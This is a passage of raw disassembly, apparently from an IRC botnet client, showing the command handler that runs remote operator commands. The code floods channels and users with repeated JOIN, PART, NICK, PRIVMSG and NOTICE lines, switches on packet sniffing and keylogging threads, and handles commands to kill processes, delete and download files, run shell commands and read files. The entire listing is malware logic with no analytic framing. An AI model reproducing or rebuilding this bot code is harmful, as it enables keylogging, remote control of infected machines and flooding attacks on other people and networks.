loc_4050F1: ; CODE XREF: sub_401CC7+33FC�j
; sub_401CC7+3407�j
push edi ; Str2
push offset aPart_1 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40512E
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_40512E
push eax
lea eax, [ebp+Dst]
push offset aPartS ; "part %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
loc_40512E: ; CODE XREF: sub_401CC7+3439�j
; sub_401CC7+3444�j
push edi ; Str2
push offset aPartflood ; "partflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405170
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_405170
push offset dword_43D41C
push eax
lea eax, [ebp+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_405170: ; CODE XREF: sub_401CC7+3476�j
; sub_401CC7+3481�j
push edi ; Str2
push offset aPnick ; "pnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4051E7
cmp [ebp+esi+Format], ebx
jz short loc_4051E7
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B4]
push edx
push [ebp+esi+Format]
push offset aSI ; "%s%i"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_17B4]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
loc_4051E7: ; CODE XREF: sub_401CC7+34B8�j
; sub_401CC7+34C1�j
push edi ; Str2
push offset aJoinPart ; "join/part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40533E
cmp [ebp+esi+Format], ebx
jz loc_40533E
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_0 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_43D41C
push [ebp+esi+Format]
push offset aPartSS_0 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_1 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D41C
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS_1 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aJoinS_2 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 0C8h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D41C
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS_2 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_40533E: ; CODE XREF: sub_401CC7+352F�j
; sub_401CC7+353C�j
push edi ; Str2
push offset aDcc ; "dcc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4053D6
cmp [ebp+esi+Format], ebx
jz short loc_4053D6
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+Dst]
push edx
push [ebp+esi+Format]
push offset aPrivmsgS_0 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 24h
loc_4053D6: ; CODE XREF: sub_401CC7+3686�j
; sub_401CC7+3693�j
push edi ; Str2
push offset aNick_0 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4054DE
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz loc_4054DE
push eax
lea eax, [ebp+Dst]
push offset aJoinS_3 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418688
add esp, 14h
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_1 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418688
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_2 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 1F4h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418688
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_3 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
loc_4054DE: ; CODE XREF: sub_401CC7+371E�j
; sub_401CC7+372D�j
push edi ; Str2
push offset aChgnick ; "chgnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405523
lea eax, [ebp+var_1808]
push eax ; Dest
call sub_418688
pop ecx
lea eax, [ebp+var_1808]
push eax
lea eax, [ebp+Dst]
push offset aNickS_4 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
loc_405523: ; CODE XREF: sub_401CC7+3826�j
push edi ; Str2
push offset aMsg ; "msg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405618
cmp [ebp+esi+Format], ebx
jz loc_405618
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_4 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_43D420
push [ebp+esi+Format]
push offset aPrivmsgSS_0 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_1 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_2 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_405618: ; CODE XREF: sub_401CC7+386B�j
; sub_401CC7+3878�j
push edi ; Str2
push offset aNotice_2 ; "notice"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40570D
cmp [ebp+esi+Format], ebx
jz loc_40570D
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_5 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
lea eax, [ebp+Dst]
push offset dword_43D420
push [ebp+esi+Format]
push offset aNoticeSS_2 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_3 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_4 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_40570D: ; CODE XREF: sub_401CC7+3960�j
; sub_401CC7+396D�j
push edi ; Str2
push offset aCtcp ; "ctcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40582E
cmp [ebp+esi+Format], ebx
jz loc_40582E
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_6 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_2 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_4 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
loc_40582E: ; CODE XREF: sub_401CC7+3A55�j
; sub_401CC7+3A62�j
push edi ; Str2
push offset aMix ; "mix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40595E
cmp [ebp+esi+Format], ebx
jz loc_40595E
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_7 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_5 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_5 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_3 ; "PRIVMSG %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_4F6380 ; Sleep
push offset dword_43D420
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_6 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_40595E: ; CODE XREF: sub_401CC7+3B76�j
; sub_401CC7+3B83�j
push edi ; Str2
push offset aRegister ; "register"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4059A2
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_4059A2
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNickservRegist ; "nickserv register %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_4059A2: ; CODE XREF: sub_401CC7+3CA6�j
; sub_401CC7+3CB1�j
push edi ; Str2
push offset aOff_0 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4065C5
mov [ebp+arg_18], offset dword_4ED36C
loc_4059BE: ; CODE XREF: sub_401CC7+3D1B�j
mov eax, [ebp+arg_18]
cmp dword ptr [eax-4], 1
jnz short loc_4059D4
mov eax, [eax]
cmp eax, ebx
jbe short loc_4059D4
push eax
call dword_4E42B8 ; closesocket
loc_4059D4: ; CODE XREF: sub_401CC7+3CFE�j
; sub_401CC7+3D04�j
add [ebp+arg_18], 210h
cmp [ebp+arg_18], offset dword_4F3A8C
jl short loc_4059BE
cmp [ebp+var_8], ebx
jnz loc_4065C5
push ebx ; int
push [ebp+var_4] ; int
push offset unk_4427D0 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
jmp loc_4065C5
; ---------------------------------------------------------------------------
loc_405A0C: ; CODE XREF: sub_401CC7+31AC�j
push [ebp+arg_8] ; Str2
push offset aNick_1 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A57
push [ebp+arg_8] ; Str2
push offset aN ; "n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A57
push [ebp+arg_8] ; Str2
push offset aJoin_0 ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A34
push [ebp+arg_8] ; Str2
push offset aJ ; "j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A34
push [ebp+arg_8] ; Str2
push offset aPart_2 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A18
push [ebp+arg_8] ; Str2
push offset aPt ; "pt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A18
push [ebp+arg_8] ; Str2
push offset aRaw ; "raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099DE
push [ebp+arg_8] ; Str2
push offset aR_2 ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099DE
push [ebp+arg_8] ; Str2
push offset aKillthread ; "killthread"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40991B
push [ebp+arg_8] ; Str2
push offset aK ; "k"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40991B
push [ebp+arg_8] ; Str2
push offset aC_quit ; "c_quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409870
push [ebp+arg_8] ; Str2
push offset aC_q ; "c_q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409870
push [ebp+arg_8] ; Str2
push offset aC_rndnick ; "c_rndnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409816
push [ebp+arg_8] ; Str2
push offset aC_rn ; "c_rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409816
push [ebp+arg_8] ; Str2
push offset aPrefix ; "prefix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409801
push [ebp+arg_8] ; Str2
push offset aPr ; "pr"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409801
push [ebp+arg_8] ; Str2
push offset aOpen ; "open"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push [ebp+arg_8] ; Str2
push offset aO ; "o"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097D7
push [ebp+arg_8] ; Str2
push offset aServer_5 ; "server"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097BE
push [ebp+arg_8] ; Str2
push offset aSe ; "se"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097BE
push [ebp+arg_8] ; Str2
push offset aDns ; "dns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409750
push [ebp+arg_8] ; Str2
push offset aDn ; "dn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409750
push [ebp+arg_8] ; Str2
push offset aKillproc ; "killproc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409724
push [ebp+arg_8] ; Str2
push offset aKp ; "kp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409724
push [ebp+arg_8] ; Str2
push offset aKill ; "kill"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4096C9
push [ebp+arg_8] ; Str2
push offset aKi ; "ki"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4096C9
push [ebp+arg_8] ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409691
push [ebp+arg_8] ; Str2
push offset aDel ; "del"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409691
push [ebp+arg_8] ; Str2
push offset aGet_3 ; "get"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095A7
push [ebp+arg_8] ; Str2
push offset aGt ; "gt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095A7
push [ebp+arg_8] ; Str2
push offset aList ; "list"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409589
push [ebp+arg_8] ; Str2
push offset aLi ; "li"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409589
push [ebp+arg_8] ; Str2
push offset aVisit ; "visit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409499
push [ebp+arg_8] ; Str2
push offset aV ; "v"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409499
push [ebp+arg_8] ; Str2
push offset aMirccmd ; "mirccmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409464
push [ebp+arg_8] ; Str2
push offset aMirc ; "mirc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409464
push [ebp+arg_8] ; Str2
push offset aCmd ; "cmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093FC
push [ebp+arg_8] ; Str2
push offset aCm ; "cm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093FC
push [ebp+arg_8] ; Str2
push offset aReadfile ; "readfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409385
push [ebp+arg_8] ; Str2
push offset aRf ; "rf"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409385
push [ebp+arg_8] ; Str2
push offset aPsniff ; "psniff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405EF4
push edi ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405EBC
push 20h
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_405DE6
push offset dword_442DEC
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_405DE6: ; CODE XREF: sub_401CC7+4113�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_EC4], eax
mov eax, [ebp+var_4]
mov [ebp+var_E3C], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E38], eax
jnz short loc_405E28
mov esi, offset aHelp_0 ; "##help"
push offset byte_4E40CC ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405E28
mov esi, [ebp+Format]
loc_405E28: ; CODE XREF: sub_401CC7+4143�j
; sub_401CC7+4159�j
push esi ; Format
lea eax, [ebp+var_EC0]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_442E0C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 20h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_E40], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC4]
push ebx
push eax
push offset sub_412A8E
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_E40]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_405EAB
loc_405E95: ; CODE XREF: sub_401CC7+41E2�j
cmp [ebp+var_E34], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_405E95
; ---------------------------------------------------------------------------
loc_405EAB: ; CODE XREF: sub_401CC7+41CC�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_442E3C
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_405EBC: ; CODE XREF: sub_401CC7+4103�j
push edi ; Str2
push offset aOff ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4085D7
push ebx
push 20h
call sub_40B989
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405EEA
push eax
push offset dword_442E7C
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_405EEA: ; CODE XREF: sub_401CC7+4216�j
push offset dword_442EB8
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_405EF4: ; CODE XREF: sub_401CC7+40EE�j
push [ebp+arg_8] ; Str2
push offset aSniffer ; "sniffer"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406044
push edi ; Str2
push offset aOn_0 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40600C
push 21h
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_405F36
push offset unk_442EF0
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_405F36: ; CODE XREF: sub_401CC7+4263�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_FEC], eax
mov eax, [ebp+var_4]
mov [ebp+var_F64], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_F60], eax
jnz short loc_405F78
mov esi, offset aHelp_0 ; "##help"
push offset byte_4E40D0 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405F78
mov esi, [ebp+Format]
loc_405F78: ; CODE XREF: sub_401CC7+4293�j
; sub_401CC7+42A9�j
push esi ; Format
lea eax, [ebp+var_FE8]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_442F10 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 21h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_F68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FEC]
push ebx
push eax
push offset sub_413119
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_F68]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_405FFB
loc_405FE5: ; CODE XREF: sub_401CC7+4332�j
cmp [ebp+var_F5C], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_405FE5
; ---------------------------------------------------------------------------
loc_405FFB: ; CODE XREF: sub_401CC7+431C�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_442F40
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_40600C: ; CODE XREF: sub_401CC7+4253�j
push edi ; Str2
push offset aOff_1 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4085D7
push ebx
push 21h
call sub_40B989
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40603A
push eax
push offset unk_442F80
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_40603A: ; CODE XREF: sub_401CC7+4366�j
push offset unk_442FC0
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_406044: ; CODE XREF: sub_401CC7+423E�j
push [ebp+arg_8] ; Str2
push offset aIdent ; "ident"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406117
push edi ; Str2
push offset aOn_1 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4060DF
push 2
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_406082
push offset dword_442FFC
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_406082: ; CODE XREF: sub_401CC7+43AF�j
lea eax, [ebp+Dst]
push offset asc_44301C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 2 ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_410CB5
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45713C[esi], eax
jnz loc_4085D7
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_443048
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_401CC7+43A3�j
push edi ; Str2
push offset aOff_2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4085D7
push ebx
push 2
call sub_40B989
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40610D
push eax
push offset dword_443080
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_40610D: ; CODE XREF: sub_401CC7+4439�j
push offset dword_4430B8
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_406117: ; CODE XREF: sub_401CC7+438E�j
push [ebp+arg_8] ; Str2
push offset aKeylog ; "keylog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406291
push edi ; Str2
push offset aOn_2 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406188
push edi ; Str2
push offset aFile ; "file"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406188
push edi ; Str2
push offset aOff_3 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4085D7
push ebx
push 23h
call sub_40B989
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40617E
push eax
push offset dword_443178
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_40617E: ; CODE XREF: sub_401CC7+44AA�j
push offset dword_4431B4
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_406188: ; CODE XREF: sub_401CC7+4476�j
; sub_401CC7+4487�j
push 23h
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_40619E
push offset dword_4430EC
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_40619E: ; CODE XREF: sub_401CC7+44CB�j
mov eax, [ebp+arg_4]
push edi ; Str2
mov [ebp+var_C5C], eax
mov eax, [ebp+var_4]
push offset aFile_0 ; "file"
mov [ebp+var_BD4], eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4061CD
mov [ebp+var_BD0], 1
jmp short loc_4061D6
; ---------------------------------------------------------------------------
loc_4061CD: ; CODE XREF: sub_401CC7+44F8�j
mov eax, [ebp+var_8]
mov [ebp+var_BD0], eax
loc_4061D6: ; CODE XREF: sub_401CC7+4504�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_4061FD
mov esi, offset aHelp_1 ; "##help"
push offset byte_4E40D4 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4061FD
mov esi, [ebp+Format]
loc_4061FD: ; CODE XREF: sub_401CC7+4518�j
; sub_401CC7+452E�j
push esi ; Format
lea eax, [ebp+var_C54]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_443114 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 23h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_C58], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C5C]
push ebx
push eax
push offset sub_4127AD
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_C58]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_406280
loc_40626A: ; CODE XREF: sub_401CC7+45B7�j
cmp [ebp+var_BCC], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40626A
; ---------------------------------------------------------------------------
loc_406280: ; CODE XREF: sub_401CC7+45A1�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_443138
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_406291: ; CODE XREF: sub_401CC7+4461�j
push [ebp+arg_8] ; Str2
push offset aNet ; "net"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406569
cmp dword_4E42F0, ebx
jz short loc_4062C2
cmp dword_4E4318, ebx
jz short loc_4062C2
push offset unk_44335C
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_4062C2: ; CODE XREF: sub_401CC7+45E7�j
; sub_401CC7+45EF�j
cmp [ebp+var_C], ebx
jz loc_407028
mov eax, [ebp+esi+Format]
